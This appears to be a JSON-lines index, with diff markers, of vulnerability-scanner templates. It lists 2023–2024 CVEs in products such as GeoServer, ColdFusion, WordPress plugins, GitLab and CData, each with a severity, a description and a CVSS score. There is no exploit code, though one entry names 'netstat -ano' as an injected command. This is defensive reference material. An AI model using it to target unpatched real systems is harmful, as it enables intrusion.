{"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"}
{"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"}
{"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"}
{"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"}
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
{"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"}
{"ID":"CVE-2023-44813","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44813.yaml"}
{"ID":"CVE-2023-4521","Info":{"Name":"Import XML and RSS Feeds \u003c 2.1.5 - Unauthenticated RCE","Severity":"critical","Description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4521.yaml"}
{"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"}
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
{"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"}
{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
{"ID":"CVE-2023-45855","Info":{"Name":"qdPM 9.2 - Directory Traversal","Severity":"high","Description":"qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-45855.yaml"}
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
{"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"}
@ -2309,6 +2315,7 @@
{"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"}
{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"}
{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"}
{"ID":"CVE-2023-5991","Info":{"Name":"Hotel Booking Lite \u003c 4.8.5 - Arbitrary File Download \u0026 Deletion","Severity":"critical","Description":"The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5991.yaml"}
{"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"}
{"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"}
{"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"}
@ -2319,6 +2326,7 @@
{"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"}
{"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"}
{"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"}
{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6389.yaml"}
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
{"ID":"CVE-2023-6567","Info":{"Name":"LearnPress \u003c= 4.2.5.7 - SQL Injection","Severity":"high","Description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6567.yaml"}
{"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"}
@ -2328,13 +2336,16 @@
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision IP ping.php - Command Execution","Severity":"critical","Description":"A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
{"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"}
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
{"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"}
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
{"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"}
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
{"ID":"CVE-2024-0337","Info":{"Name":"Travelpayouts \u003c= 1.1.16 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0337.yaml"}
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
{"ID":"CVE-2024-0881","Info":{"Name":"Combo Blocks \u003c 2.2.76 - Improper Access Control","Severity":"medium","Description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0881.yaml"}
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the sorting parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
@ -2343,6 +2354,7 @@
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"}
{"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"}
{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
{"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"}
@ -2375,11 +2387,19 @@
{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"}
{"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"}
{"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"}
{"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"}
{"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"}
{"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"}
{"ID":"CVE-2024-31849","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"}
{"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"}
{"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"}
{"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"}
{"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"}
{"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"}
{"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"}
{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
{"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"}
